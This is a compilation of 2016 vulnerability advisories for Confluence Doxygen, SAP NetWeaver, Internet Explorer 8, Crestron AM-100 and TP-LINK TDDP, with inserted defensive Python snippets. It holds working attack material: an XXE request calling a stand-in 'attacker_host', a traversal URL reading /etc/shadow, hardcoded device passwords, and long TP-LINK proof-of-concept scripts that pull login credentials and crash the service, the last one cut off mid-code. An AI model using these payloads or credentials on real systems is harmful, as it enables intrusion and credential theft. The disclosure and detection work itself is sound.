[RCESEC-2016-009] AppFusions Doxygen for Atlassian Confluence v1.3.2 renderContent() Persistent Cross-Site Scripting

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        AppFusions Doxygen for Atlassian Confluence
Vendor URL:     www.appfusions.com
Type:           Cross-site Scripting [CWE-79]
Date found:     29/06/2016
Date published: 20/11/2016
CVSSv3 Score:   6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
CVE:            -


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.3
AppFusions Doxygen for Atlassian Confluence v1.3.2 
AppFusions Doxygen for Atlassian Confluence v1.3.1
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.


4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
- Doxygen blueprint in Confluence to allow Doxygen archive imports
- Display documentation from annotated sources such as Java (i.e., JavaDoc),
  C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and UNO/OpenOffice
  flavors), Fortran, VHDL, Tcl, D in Confluence.
- Navigation supports code structure (classes, hierarchies, files), element
  dependencies, inheritance and collaboration diagrams.
- Search documentation from within Confluence
- Restrict access to who can see/add what
- Doxygen in JIRA also available

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The application offers the functionality to import Doxygen documentation via a file upload to make it available in a Confluence page, but does not properly validate the file format or the contents of the uploaded Doxygen file. Since the uploaded file is essentially a zip archive, it is possible to store any type of file in it, such as an HTML file containing arbitrary script.

In DoxygenFileServlet.java (lines 82-105) the "file" GET parameter is read
and used as part of a File object:

private void renderContent(HttpServletRequest request, HttpServletResponse response) throws IOException {
    String pathInfo = request.getPathInfo();
    String[] pathInfoParts = pathInfo.split("file/");
    String requestedFile = pathInfoParts[1];
    File homeDirectory = this.applicationProperties.getHomeDirectory();
    String doxygenDir = homeDirectory.getAbsolutePath() + File.separator + "doxygen";
    File file = new File(doxygenDir, requestedFile);
    String contentType = this.getServletContext().getMimeType(file.getName());
    if (contentType == null) {
        contentType = "application/octet-stream";
    }
    response.setContentType(contentType);
    FileInputStream inputStream = null;
    ServletOutputStream outputStream = null;
    try {
        inputStream = new FileInputStream(file);
        outputStream = response.getOutputStream();
        IOUtils.copy((InputStream)inputStream, (OutputStream)outputStream);
    }
    finally {
        IOUtils.closeQuietly((InputStream)inputStream);
        IOUtils.closeQuietly((OutputStream)outputStream);
    }
}
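
As an added example (not the plugin's code, and in Python 3 rather than the servlet's Java), a serving helper that keeps the servlet's "file/" split but confines the path to the Doxygen directory and serves imported HTML with `nosniff` and a sandboxing CSP, so script inside an uploaded page cannot act in the Confluence origin. The allow-list of types and the directory name are assumptions.

```python
import posixpath

# Types a Doxygen HTML export legitimately contains (constructed allow-list for
# this example). Anything else is offered as a download rather than rendered.
RENDERABLE_TYPES = {
    ".html": "text/html; charset=utf-8",
    ".css": "text/css",
    ".js": "application/javascript",
    ".png": "image/png",
    ".svg": "image/svg+xml",
}


class RequestRejected(Exception):
    """The requested path is not a plain file name below the doxygen directory."""


def resolve_requested_file(doxygen_dir, path_info):
    """Take the part after "file/" as the servlet does, then confine it to doxygen_dir.

    POSIX separators are assumed. Rejecting "..", "." and empty segments is general
    hardening for this file-serving pattern, not a finding from the advisory.
    """
    if "file/" not in path_info:
        raise RequestRejected("no file/ segment in %r" % path_info)
    requested = path_info.split("file/", 1)[1]
    segments = requested.split("/")
    if any(seg in ("", ".", "..") for seg in segments):
        raise RequestRejected("path %r does not stay below the doxygen directory" % requested)
    return posixpath.join(doxygen_dir, *segments)


def response_headers(full_path):
    """Headers for serving an imported file without handing it the Confluence origin."""
    ext = posixpath.splitext(full_path)[1].lower()
    headers = {"X-Content-Type-Options": "nosniff"}  # no MIME sniffing into HTML
    if ext in RENDERABLE_TYPES:
        headers["Content-Type"] = RENDERABLE_TYPES[ext]
    else:
        # Unknown types are downloaded, never interpreted by the browser.
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = "attachment"
    if ext == ".html":
        # The sandbox directive gives the document an opaque origin: its scripts
        # still run (Doxygen's navigation needs them) but cannot read Confluence's
        # DOM, cookies or storage.
        headers["Content-Security-Policy"] = "sandbox allow-scripts"
    return headers


def serve(doxygen_dir, path_info):
    """Plan the response for one request: the file to stream and the headers to send."""
    full_path = resolve_requested_file(doxygen_dir, path_info)
    return {"file": full_path, "headers": response_headers(full_path)}


if __name__ == "__main__":
    print(serve("/var/confluence/doxygen", "/file/proj/index.html"))
```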



6. RISK
=======
To successfully exploit this vulnerability, the attacker must be authenticated and must have the rights within Atlassian Confluence to upload
Doxygen files (default).

The vulnerability allows remote attackers to permanently embed arbitrary script code into the context of an Atlassian Confluence page, which enables a wide range of attacks, such as redirecting users to arbitrary pages, presenting phishing content, or attacking the browser and its components of any user visiting the page.

7. POC
======

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40817.zip

8. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4


9. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/08/2016: Discovery of the vulnerability
23/08/2016: Sent preliminary advisory incl. PoC to known mail address
30/08/2016: No response, sent out another notification
30/08/2016: Vendor response, team is working on it
20/10/2016: Vendor releases v1.3.4 which fixes this vulnerability
20/11/2016: Advisory released


10. REFERENCES
==============
https://bugs.rcesecurity.com/redmine/issues/13
            
Application:	SAP NetWeaver AS JAVA
Versions Affected:	SAP NetWeaver AS JAVA 7.5
Vendor URL:	SAP
Bugs:	XXE
Reported:	09.03.2016
Vendor response:	10.03.2016
Date of Public Advisory:	09.08.2016
Reference:	SAP Security Note 2296909
Author:	Vahagn Vardanyan (ERPScan)

1. ADVISORY INFORMATION

Title:  [ERPSCAN-16-034] SAP NetWeaver AS JAVA – XXE vulnerability in BC-BMT-BPM-DSK component
Advisory ID: [ERPSCAN-16-034]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/
Date published: 11.11.2016
Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: XXE
Impact: Denial of Service, Read File
Remotely Exploitable: yes
Locally Exploitable: no

CVSS Information

CVSS Base Score v3:    6.4 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) Low (L)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C : Impact to Confidentiality Low (L)
I : Impact to Integrity Low (L)
A : Impact to Availability High (H)


3. VULNERABILITY DESCRIPTION

1) It is possible that an attacker can perform a DoS attack (for example, an XML entity expansion attack).

2) An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the
attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving him access.


4. VULNERABLE PACKAGES

BPEM PORTAL CONTENT 7.20
BPEM PORTAL CONTENT 7.30
BPEM PORTAL CONTENT 7.31
BPEM PORTAL CONTENT 7.40
BPEM PORTAL CONTENT 7.50


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2296909


6. AUTHOR

 Vahagn Vardanyan (ERPScan)


7. TECHNICAL DESCRIPTION

PoC


POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1
Content-Type: text/xml
User-Agent: ERPscan
Host: SAP_IP:SAP_PORT
Content-Length: 480
Connection: Keep-Alive
Cache-Control: no-cache
Authorization: Basic ZXJwc2NhbjplcnBzY2Fu

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host">
]><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <SOAP-ENV:Body>
       <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>
   &xxe;</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
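
Added example, not part of ERPScan's advisory: a Python 3 pre-parse guard for a SOAP endpoint that refuses any DTD before an entity can be declared or expanded, tried on the PoC body above and on the same isBPMSInUse call without the DOCTYPE (the clean body is constructed).

```python
import xml.parsers.expat

# The PoC body from the advisory, embedded as the hostile sample
# (the attacker_host placeholder is the advisory's own).
POC_BODY = (
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host">\n'
    ']><SOAP-ENV:Envelope\n'
    'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"\n'
    'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"\n'
    'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
    'xmlns:xsd="http://www.w3.org/2001/XMLSchema">\n'
    '   <SOAP-ENV:Body>\n'
    '       <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>\n'
    '   &xxe;</SOAP-ENV:Body>\n'
    '</SOAP-ENV:Envelope>\n'
)

# Constructed: the same call as a legitimate client would send it, with no DTD.
CLEAN_BODY = (
    '<SOAP-ENV:Envelope\n'
    'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"\n'
    'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"\n'
    'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
    'xmlns:xsd="http://www.w3.org/2001/XMLSchema">\n'
    '   <SOAP-ENV:Body>\n'
    '       <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>\n'
    '   </SOAP-ENV:Body>\n'
    '</SOAP-ENV:Envelope>\n'
)


class UnsafeXML(ValueError):
    """Raised when the document carries a DTD, which a SOAP request never needs."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Fires on "<!DOCTYPE", i.e. before any entity inside it is even declared.
    raise UnsafeXML("DOCTYPE declaration (%r) is not accepted" % name)


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    raise UnsafeXML("entity declaration (%r) is not accepted" % name)


def parse_soap_strict(body):
    """Parse a SOAP envelope, aborting at the first sign of a DTD.

    Returns the (namespace, local-name) pairs of the elements seen, in order.
    Exceptions raised inside expat handlers propagate out of Parse().
    """
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.EntityDeclHandler = _reject_entity
    # Belt and braces: never resolve external parameter entities either.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    elements = []

    def start(name, attrs):
        namespace, _, local = name.rpartition(" ")
        elements.append((namespace, local))

    parser.StartElementHandler = start
    parser.Parse(body, True)
    return elements


def inspect_request(body):
    """Decide whether a request body may proceed to the real SOAP handler."""
    try:
        elements = parse_soap_strict(body)
    except UnsafeXML as exc:
        return {"accepted": False, "reason": str(exc), "elements": []}
    except xml.parsers.expat.ExpatError as exc:
        return {"accepted": False, "reason": "malformed XML: %s" % exc, "elements": []}
    return {"accepted": True, "reason": "", "elements": elements}


if __name__ == "__main__":
    print(inspect_request(POC_BODY))
    print(inspect_request(CLEAN_BODY))
```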


8. REPORT TIMELINE

Sent:  09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 09.08.2016


9. REFERENCES

https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/
            
<!--
Source: http://blog.skylined.nl/20161121001.html

Synopsis

A specially crafted web-page can cause an unknown type of memory corruption in Microsoft Internet Explorer 8. This vulnerability can cause the Ptls5::LsFindSpanVisualBoundaries method (or other methods called by it) to access arbitrary memory.

Known affected software, attack vectors and mitigations

Microsoft Internet Explorer 8

An attacker would need to get a target user to open a specially crafted web-page. JavaScript is not necessarily required to trigger the issue.

Description

The memory corruption causes the Ptls5::LsFindSpanVisualBoundaries method to access data at seemingly random addresses. However, these addresses appear to always be in the same range as valid heap addresses, even if they are often not DWORD aligned. The reason for the memory corruption is not immediately obvious.

Repro.html
-->

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
  <body>
    <button>
      <pre>
        <x>
          <sub>
            <ruby>
              <img height="1"/>
            </ruby>
          </sub>
        </x>
      </pre>
    </button>
  </body>
</html>

<!--
Time-line

July 2014: This vulnerability was found through fuzzing.
November 2016: Details of this issue are released.
-->
            
=================================================================
# Crestron AM-100 (Multiple Vulnerabilities)
=================================================================
# Date: 2016-08-01
# Exploit Author: Zach Lanier
# Vendor Homepage: https://www.crestron.com/products/model/am-100
# Version: v1.1.1.11 - v1.2.1
# CVE: CVE-2016-5639 
# References: 
#   https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi
#   https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md

Description:
The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues.

1) Path Traversal

GET request: 
http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow

2) Hidden Management Console

http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi
The AM-100 has a hardcoded default credential of rdtool::mistral5885
This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode).

3) Hardcoded credentials

The default root password for these devices is root::awind5885.
Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02, etc. Cleartext credentials can be read directly from these files.
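
Added example (not from the advisory): Python 3 detection logic that scans constructed AM-100 access-log lines for traversal sequences in login.cgi query parameters, including percent-encoded ones, and for hits on the hidden login_rdtool.cgi console. The log format, timestamps and client addresses are constructed; the first request line is the advisory's own traversal example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoints the advisory names on the AM-100.
HIDDEN_CONSOLE = "/cgi-bin/login_rdtool.cgi"

# Constructed access-log lines (common log format).
SAMPLE_LOG = """\
10.0.0.7 - - [01/Aug/2016:10:00:01 +0000] "GET /cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow HTTP/1.1" 200 1321
10.0.0.7 - - [01/Aug/2016:10:00:02 +0000] "GET /cgi-bin/login.cgi?lang=en&src=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 980
10.0.0.9 - - [01/Aug/2016:10:00:03 +0000] "GET /cgi-bin/login.cgi?lang=en HTTP/1.1" 200 4102
10.0.0.7 - - [01/Aug/2016:10:00:04 +0000] "GET /cgi-bin/login_rdtool.cgi HTTP/1.1" 200 2210
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def has_traversal(value, rounds=3):
    """True if the value, after repeated percent-decoding, contains a '..' path segment.

    Decoding more than once catches double-encoded sequences such as %252e%252e.
    """
    decoded = value
    for _ in range(rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    segments = re.split(r"[\\/]+", decoded)
    return ".." in segments


def analyse_request(target):
    """Return a list of findings for one request target (path plus query)."""
    parts = urlsplit(target)
    findings = []
    if parts.path == HIDDEN_CONSOLE:
        findings.append("hidden rdtool console accessed")
    # parse_qsl already percent-decodes each value once.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if has_traversal(value):
            findings.append("path traversal in parameter %r" % key)
    return findings


def scan_log(text):
    """Return (line number, finding) pairs for every suspicious request in the log."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for finding in analyse_request(match.group("target")):
            alerts.append((lineno, finding))
    return alerts


if __name__ == "__main__":
    for lineno, finding in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (lineno, finding))
```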
            
1. Advisory Information

Title: TP-LINK TDDP Multiple Vulnerabilities
Advisory ID: CORE-2016-0007
Advisory URL: http://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities
Date published: 2016-11-21
Date of last update: 2016-11-18
Vendors contacted: TP-Link
Release mode: User release

2. Vulnerability Information

Class: Missing Authentication for Critical Function [CWE-306], Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [CWE-120]
Impact: Code execution, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

3. Vulnerability Description

TP-LINK [1] ships some of their devices with a debugging protocol activated by default. This debugging protocol listens on UDP port 1040 on the LAN interface.

Vulnerabilities were found in the implementation of this protocol that could lead to remote code execution and an information leak (credential acquisition).

4. Vulnerable Devices

TP-LINK WA5210g. (Firmware v1 and v2 are vulnerable)
Other devices might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

No workarounds are available for this device.

6. Credits

This vulnerability was discovered and researched by Andres Lopez Luksenberg from Core Security Exploit Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

7. Technical Description / Proof of Concept Code

TP-LINK distributes some of their hardware with a debugging service activated by default. This program uses a custom protocol. Vulnerabilities were found in this protocol that could lead to remote code execution or an information leak.

7.1. Missing Authentication for TDDP v1

[CVE-pending-assignment-1] If version 1 is selected when communicating with the TDDP service, there is no authentication in place. Additionally, if the message handler accepts the "Get configuration" message type, the program leaks the web interface configuration file, which includes the web login credentials.
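
Added example, not part of Core's advisory or its PoC: a Python 3 decoder for the 12-byte TDDP header the advisory's proof of concept uses (version, type, code, replyInfo, big-endian packetLength, little-endian pktID, subType, reserved) that flags unauthenticated v1 requests to UDP/1040 such as the "Get configuration" message. The type names follow the PoC's constants; the sample datagram is constructed.

```python
import struct
from dataclasses import dataclass, field

TDDP_PORT = 1040   # UDP port the debugging service listens on (from the advisory)
HEADER_LEN = 12
TYPE_NAMES = {1: "SET_CONFIG", 2: "GET_CONFIG", 3: "CMD_SYS0_PR",
              5: "GET_SERIAL_NUMBER", 10: "GET_PRODUCT_ID"}


@dataclass
class TDDPPacket:
    version: int
    type: int
    code: int
    reply_info: int
    packet_length: int
    pkt_id: int
    sub_type: int
    payload: bytes
    problems: list = field(default_factory=list)


def parse_tddp(datagram: bytes) -> TDDPPacket:
    """Decode a TDDP header. Note the mixed byte order: packetLength is
    big-endian while pktID is little-endian, exactly as the PoC's Structure has it."""
    if len(datagram) < HEADER_LEN:
        raise ValueError("datagram shorter than the TDDP header")
    version, type_, code, reply_info = struct.unpack_from(">BBBB", datagram, 0)
    (packet_length,) = struct.unpack_from(">L", datagram, 4)
    (pkt_id,) = struct.unpack_from("<H", datagram, 8)
    sub_type, _reserved = struct.unpack_from(">BB", datagram, 10)
    payload = datagram[HEADER_LEN:]
    pkt = TDDPPacket(version, type_, code, reply_info, packet_length, pkt_id, sub_type, payload)
    if packet_length != len(payload):
        # A length field that disagrees with the datagram is worth noting on its own.
        pkt.problems.append("packetLength %d does not match payload size %d"
                            % (packet_length, len(payload)))
    return pkt


def classify(datagram: bytes, dst_port: int):
    """Return an alert string for unauthenticated TDDP v1 traffic, or None."""
    if dst_port != TDDP_PORT:
        return None
    try:
        pkt = parse_tddp(datagram)
    except ValueError:
        return None
    if pkt.version != 1:
        return None   # the advisory's finding concerns protocol version 1 only
    name = TYPE_NAMES.get(pkt.type, "type %d" % pkt.type)
    if pkt.type == 2:
        # GET_CONFIG: 16 reserved bytes, then the requested configuration section.
        section = pkt.payload[16:].rstrip(b"\x00").decode("ascii", "replace")
        return "TDDPv1 %s for section %r (leaks web credentials)" % (name, section)
    if pkt.type in (1, 3):
        return "TDDPv1 %s (unauthenticated configuration change)" % name
    return "TDDPv1 %s" % name


def sample_get_config() -> bytes:
    """Constructed datagram with the same layout the advisory's PoC builds."""
    payload = b"\x00" * 16 + b"all"
    return (struct.pack(">BBBB", 1, 2, 0, 1)
            + struct.pack(">L", len(payload))
            + struct.pack("<H", 1)
            + struct.pack(">BB", 0, 0)
            + payload)


if __name__ == "__main__":
    print(parse_tddp(sample_get_config()))
    print(classify(sample_get_config(), TDDP_PORT))
```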

The following is a proof of concept to demonstrate the vulnerability (Impacket [2] is required for the PoC to work):

 
import socket
import re
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
    structure = (
       ('version','B=0x1'),
       ('type','B=0'),      
       ('code','B=0'),
       ('replyInfo','B=0'),
       ('packetLength','>L=0'),
       ('pktID','<H=1'),
       ('subType','B=0'),
       ('reserved','B=0'),
       ('payload',':=""'),       
    )
    def printPayload(self):
        print self.getPayloadAsString()
   
    def getPayloadAsString(self):
        s=''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s


class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5
   
    GET_PRODUCT_ID = 10   
   
    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1       
        return tddp
   
    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp
       
    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp
   
    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp
       

class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)
       
    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")
       
        v = v.replace("\r", "")
        v = v.replace("\n", "")
       
        return k,v
       
    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)
       
        for k, v in k_v:
            k,v = self.__sanitizeKeyValue(k,v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]
               
            self.__dict__[k] = real_value
            self.__key_order.append(k)
           
    def __str__(self):
        cfg = []
        cfg.append(self.Header)
       
        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value
           
            line = "%s %s" % (k, str_value)
           
            cfg.append(line)
       
       
        str_cfg =  "\r\n".join(cfg)
       
        return str_cfg
       
class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()
       
    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)
   
    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)
   
    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])
       
    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
       
    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
       
    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)
       
    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)
       
    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)
       
    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)
 
HOST = "192.168.1.254"

s = TDDPSessionV1(HOST)
config = s.getConfig()
print "user: ", config.lgn_usr
print "pass: ", config.lgn_pwd


 
7.2. Buffer Overflow in TDDP v1 protocol

[CVE-pending-assignment-2] A buffer overflow vulnerability was found when sending a handcrafted "set configuration" message to the TDDP service with an oversized configuration file and forcing version 1 in the packet.

The following is a proof of concept to demonstrate the vulnerability by crashing the TDDP service (Impacket [2] is required for the PoC to work). To re-establish the TDDP service, the device must be restarted:

 
import socket
import re
import string 
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct


class TDDP(Structure):
    structure = (
       ('version','B=0x1'),
       ('type','B=0'),      
       ('code','B=0'),
       ('replyInfo','B=0'),
       ('packetLength','>L=0'),
       ('pktID','<H=1'),
       ('subType','B=0'),
       ('reserved','B=0'),
       ('payload',':=""'),   
    )
    def printPayload(self):
        print self.getPayloadAsString()
   
    def getPayloadAsString(self):
        s=''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s
        
        
class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5
   
    GET_PRODUCT_ID = 10   
   
    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1       
        return tddp
   
    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp
       
    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp
   
    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp
       
       
class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)
       
    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")
       
        v = v.replace("\r", "")
        v = v.replace("\n", "")
       
        return k,v
       
    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)
       
        for k, v in k_v:
            k,v = self.__sanitizeKeyValue(k,v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]
               
            self.__dict__[k] = real_value
            self.__key_order.append(k)
           
    def __str__(self):
        cfg = []
        cfg.append(self.Header)
       
        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value
           
            line = "%s %s" % (k, str_value)
           
            cfg.append(line)
       
       
        str_cfg =  "\r\n".join(cfg)
       
        return str_cfg
        
        
class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()
        
    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)
    
    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)
    
    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])
        
    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
        
    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
        
    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)
        
    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)
        
    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)
        
    def setConfig(self, aConfig):
